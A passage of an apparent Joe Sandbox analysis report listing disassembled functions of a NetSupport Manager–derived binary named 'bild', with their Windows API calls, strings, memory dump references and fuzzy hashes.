                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 180989782-0
                                                                                    • Opcode ID: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                    • Instruction ID: 262247fb5796f255492f056fed215dfab2d13c04184fcb9cbdc2136a2e7489e8
                                                                                    • Opcode Fuzzy Hash: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                    • Instruction Fuzzy Hash: 6901FA75D14219ABDB04DFA8C845BAEBBB8EF08710F108166F924E7284D774AA018B91
                                                                                    Function 110B3090 Relevance: 9.0, APIs: 6, Instructions: 42synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
                                                                                    • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
                                                                                    • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$EventObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 2857295742-0
                                                                                    • Opcode ID: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                    • Instruction ID: 8ed48fa67f8c8c814876f8dc7215a606f8693e2702a4d531ac155f54366f369e
                                                                                    • Opcode Fuzzy Hash: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                    • Instruction Fuzzy Hash: 46011A75A087049BE7A0DFB988D4A96F7ECEF58300F11592EE5AAC3200CB78B8448F50
                                                                                    Function 110770E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 1107712B
                                                                                      • Part of subcall function 11076470: DeferWindowPos.USER32(8B000EA9,00000000,D8E85BC0,33CD335E,?,00000000,33CD335E,110771C6), ref: 110764B3
                                                                                    • EqualRect.USER32(?,?), ref: 1107713C
                                                                                    • SetWindowPos.USER32(00000000,00000000,?,33CD335E,D8E85BC0,8B000EA9,00000014,?,?,?,?,?,1107731A,00000000,?), ref: 11077196
                                                                                    Strings
                                                                                    • m_hWnd, xrefs: 11077177
                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077172
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$DeferEqualPointsRect
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 2754115966-2830328467
                                                                                    • Opcode ID: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                    • Instruction ID: 41b5b1a8551b5e1f2f99f8414896ea4fcac58e3e889cf17ca758b789060a613c
                                                                                    • Opcode Fuzzy Hash: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                    • Instruction Fuzzy Hash: E0413EB5A006099FDB14CFA9C884EAAFBF5FF88704F108559E9559B344D770AD00CBA4
                                                                                    Function 11089150 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108918F
                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CEF56,?), ref: 110891A4
                                                                                    • LockResource.KERNEL32(00000000,?,00000000,?,110CEF56,?), ref: 110891D6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLock
                                                                                    • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                    • API String ID: 2752051264-327499879
                                                                                    • Opcode ID: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                    • Instruction ID: ac104577f0cb8d44e6482e86c7e4f76e51294e6aac98140987b3b76ba3c25106
                                                                                    • Opcode Fuzzy Hash: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                    • Instruction Fuzzy Hash: 08110D3AF4C22556DB12EBE9AC45B69B7E89BC07A8B410475FC6CD71C4FA61D440C3E1
                                                                                    Function 11143110 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
                                                                                    • _strrchr.LIBCMT ref: 1114315A
                                                                                    • _strrchr.LIBCMT ref: 1114316A
                                                                                    • wsprintfA.USER32 ref: 11143185
                                                                                      • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                    • String ID: BILD
                                                                                    • API String ID: 2529650285-1114602597
                                                                                    • Opcode ID: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                    • Instruction ID: d978b5afe12e8555e920acd6faf46f6bc40337599c773746d871781ff4fb06a8
                                                                                    • Opcode Fuzzy Hash: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                    • Instruction Fuzzy Hash: DD21DD31A182698FE712EF348D407DAFBB4DF15B0CF2000D8D8850B182D7716885C7A0
                                                                                    Function 11065340 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProfileStringA.KERNEL32(Windows,Device,No default printer,,LPT1:,?,00000050), ref: 11065366
                                                                                    • _memmove.LIBCMT ref: 110653B1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ProfileString_memmove
                                                                                    • String ID: Device$No default printer,,LPT1:$Windows
                                                                                    • API String ID: 1665476579-2460060945
                                                                                    • Opcode ID: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                    • Instruction ID: a358cf5610f4a81608be9fe47ec1da84b056d0ceaed1d9bd2f397f709d6f9fc8
                                                                                    • Opcode Fuzzy Hash: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                    • Instruction Fuzzy Hash: 0E119E35D002669AD700CFB0DC45BFEBBACDF01788F144158DC869B240EAF22609C3E1
                                                                                    Function 110450BD Relevance: 7.9, APIs: 5, Instructions: 401COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeString$__wcsicoll_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3719176846-0
                                                                                    • Opcode ID: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                    • Instruction ID: f73372903cd30c0382670b71593fb0b3797c4e2875fb117f6f51c869b4ccb2fb
                                                                                    • Opcode Fuzzy Hash: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                    • Instruction Fuzzy Hash: 53A10A75E006299FCB21CF59CC84ADEB7B9AF89305F2045D9E50DAB610DB32AE85CF50
                                                                                    Function 11045160 Relevance: 7.8, APIs: 5, Instructions: 258COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeString$__wcsicoll_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3719176846-0
                                                                                    • Opcode ID: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                    • Instruction ID: afd3f22c8fe7dd5f2f13fef18bd13733cf22d578236402d79b842a18f9b7ad91
                                                                                    • Opcode Fuzzy Hash: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                    • Instruction Fuzzy Hash: E3A11871E006299FCB21DF59CC84ADEB7B9AF89305F2041D9E50DAB610DB32AE85CF50
                                                                                    Function 110812D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081387
                                                                                    • ..\CTL32\DataStream.cpp, xrefs: 1108139E
                                                                                    • %02x, xrefs: 11081350
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf
                                                                                    • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                    • API String ID: 2111968516-476189988
                                                                                    • Opcode ID: 2e0a70d7f48be011b9f6aa9edf4a09ec59e0beebed33c2f057e62bcad71544d0
                                                                                    • Instruction ID: f12dac7d373f74f5fe212c0395a9fec3f200c40d2e0a4ddded7d9712e57ff33a
                                                                                    • Opcode Fuzzy Hash: 2e0a70d7f48be011b9f6aa9edf4a09ec59e0beebed33c2f057e62bcad71544d0
                                                                                    • Instruction Fuzzy Hash: E621A375A052299FD724CF65DCC4EAEB3F8EF44308F0085AEE45A97640D670AD45CB60
                                                                                    Function 110253D0 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110253E7
                                                                                    • GetDlgItem.USER32(?,00001399), ref: 11025421
                                                                                    • TranslateMessage.USER32(?), ref: 1102543A
                                                                                    • DispatchMessageA.USER32(?), ref: 11025444
                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025486
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchItemTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 1381171329-0
                                                                                    • Opcode ID: bebdcbb2c02c8b11af5fb3a0b68c2766af8923a7f1998c3c6d7298e063844038
                                                                                    • Instruction ID: 26246af105c186e59b646e9f33a047c98996dcd180a805fce9500a05ed718ca0
                                                                                    • Opcode Fuzzy Hash: bebdcbb2c02c8b11af5fb3a0b68c2766af8923a7f1998c3c6d7298e063844038
                                                                                    • Instruction Fuzzy Hash: 7B21CF70F0030A67E718DB72C885BABF7F8AB4430DF804429EA2696180FB75A441CB95
                                                                                    Function 11021300 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf$VisibleWindow
                                                                                    • String ID: %d,%d,%d,%d,%d,%d
                                                                                    • API String ID: 1671172596-1913222166
                                                                                    • Opcode ID: 85305b6f0e97ae49525742254329e378668c5d080315b458b3003d671ba0b5ff
                                                                                    • Instruction ID: 208af751730b9df0a36513b51cfb93f89bd03d9f93b9dbce85b9ce09b73d059e
                                                                                    • Opcode Fuzzy Hash: 85305b6f0e97ae49525742254329e378668c5d080315b458b3003d671ba0b5ff
                                                                                    • Instruction Fuzzy Hash: 465181746001159FD710DB68CC90F9AB7F9BF88708F108698F6599B391DB70ED45CBA0
                                                                                    Function 11117000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    • BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s, xrefs: 1111706E
